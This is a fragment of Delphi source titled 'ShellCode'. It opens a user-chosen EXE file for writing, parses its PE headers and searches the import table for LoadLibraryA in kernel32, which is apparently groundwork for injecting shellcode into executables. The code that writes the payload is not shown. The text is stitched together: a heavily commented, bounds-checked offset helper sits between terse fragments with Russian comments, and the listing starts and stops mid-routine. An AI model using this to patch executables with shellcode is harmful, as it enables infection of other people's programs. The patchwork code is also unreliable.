
ShellCode



UnMapViewOfFile(Base);
CloseHandle(hFM);
exit;
end;
Result:=RVA-ISH.VirtualAddress+ISH.PointerToRawData;
UnMapViewOfFile(Base);
CloseHandle(hFM);
end;

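// Translates a raw file offset into an RVA: finds the section whose raw-data
// range contains Offset and applies that section's (VirtualAddress -
// PointerToRawData) delta.
//
// hFile  - open handle to the PE image (must be mappable PAGE_READONLY).
// Offset - file offset to translate.
// Returns 0 when the file cannot be mapped, its size cannot be read, it has
// no NT headers, a section header would lie outside the mapped file, or no
// section covers Offset. The image is untrusted input, so every pointer
// derived from header fields is bounds-checked against the mapping before
// it is dereferenced.
function Offset2RVA(hFile: THANDLE; Offset: Cardinal): Cardinal;
var
  Base    : Pointer;
  ISH     : PIMAGESECTIONHEADER;
  INH     : PIMAGENTHEADERS;
  hFM     : THANDLE;
  x       : Integer;
  MapSize : DWORD;
  Found   : Boolean;
begin
  Result := 0;
  hFM := CreateFileMapping(hFile, nil, PAGE_READONLY, 0, 0, nil);
  if hFM = 0 then exit;
  Base := MapViewOfFile(hFM, FILE_MAP_READ, 0, 0, 0);
  if Base = nil then
  begin
    CloseHandle(hFM);
    exit;
  end;
  try
    // The view covers the whole file, so the file size bounds every header read.
    MapSize := GetFileSize(hFile, nil);
    if MapSize = INVALID_FILE_SIZE then exit;
    INH := ImageNTHeader(Base);
    if INH = nil then exit;
    // The section table follows the optional header. Use the header's own
    // SizeOfOptionalHeader instead of sizeof(IMAGE_NT_HEADERS): the optional
    // header is variable-length and a non-standard size would otherwise
    // misalign every section header read below.
    ISH := PIMAGESECTIONHEADER(DWORD(@INH.OptionalHeader) + INH.FileHeader.SizeOfOptionalHeader);
    Found := False;
    // NumberOfSections entries are indexed 0..NumberOfSections-1; the previous
    // "0 to NumberOfSections" loop read one header past the end of the table.
    for x := 0 to INH.FileHeader.NumberOfSections - 1 do
    begin
      // Refuse to read a section header that is not fully inside the mapping
      // (a malformed NumberOfSections or SizeOfOptionalHeader would steer us
      // past the end of the file).
      if (DWORD(ISH) - DWORD(Base)) + sizeof(ISH^) > MapSize then exit;
      // Half-open range: the byte at PointerToRawData+SizeOfRawData belongs to
      // the next section, not this one.
      if (Offset >= ISH.PointerToRawData) and
         (Offset < ISH.PointerToRawData + ISH.SizeOfRawData) then
      begin
        Found := True;
        break;
      end;
      inc(ISH);
    end;
    // Without a match the old code used whatever header ISH ended on, which
    // is past the table; report "not found" as 0 instead, matching the other
    // failure paths.
    if Found then
      Result := Offset + ISH.VirtualAddress - ISH.PointerToRawData;
  finally
    // Single cleanup path for every exit above.
    UnMapViewOfFile(Base);
    CloseHandle(hFM);
  end;
end;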

begin
Writeln(‘Enter Exe-File name’);
Readln(s);
h:=Createfile(s,GENERIC_READ or GENERIC_WRITE, 0,nil,OPEN_EXISTING,0,0);
if h=-1 then begin
Writeln(‘Wrong handle’);
Readln;
exit;
end;
ReadFile(h,_,sizeof(_),__,nil);
SetFilePointer(h,_._lfanew,0,FILE_BEGIN);
ReadFile(h,IOH,sizeof(IOH),__,nil);
SavedRVA:=Rva2offset(h,ioh.OptionalHeader.AddressOfEntryPoint);
if ioh.Signature<>$00004550 then
begin
writeln(‘Wrong magic’);
readln;
CloseHandle(h);
exit;
end;
__:=rva2offset(h,ioh.OptionalHeader.DataDirectory[1].VirtualAddress);
_._lfanew:=SetFilePointer(h,__,0,FILE_BEGIN);
iid.FirstThunk:=1; // лезем в чанки искать LoadLibrayA
while (s<>’LoadLibraryA’)and(iid.FirstThunk<>0) do begin
ReadFile(h,IID,sizeof(IID),__,nil);
inc(_._lfanew,__);
__:=rva2offset(h,IID.Name);
SetFilePointer(h,__,0,FILE_BEGIN);
Readfile(h,s,12,__,nil);
if (s=’kernel32.dll’)or(s=’KERNEL32.dll’) then begin // Borland и Microsoft пишут kernel32 каждый по своему
hel:=rva2offset(h,IID.FirstThunk);
repeat
SetFilePointer(h,hel,0,FILE_BEGIN);
Readfile(h,LLA,4,__,nil);
inc(hel,__);
__:=rva2offset(h,LLA)+2;
SetFilePointer(h,__,0,FILE_BEGIN);
